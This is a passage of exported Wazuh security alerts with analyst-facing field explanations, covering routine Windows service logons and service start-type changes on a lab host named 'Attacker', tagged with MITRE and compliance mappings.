data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.139+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.139+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.241675
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:22.6696087Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2951
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10448
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.228+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.228+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.243487
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.8016634Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2952
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10448
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Windows Modules Installer service was changed from auto start to demand start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Windows Modules Installer
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  TrustedInstaller
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.262+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.262+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.245267
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:38.6466082Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43521
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.594+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.594+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  21
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.252603
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:39.5684739Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43523
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:44.889+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:44.889+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  22
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

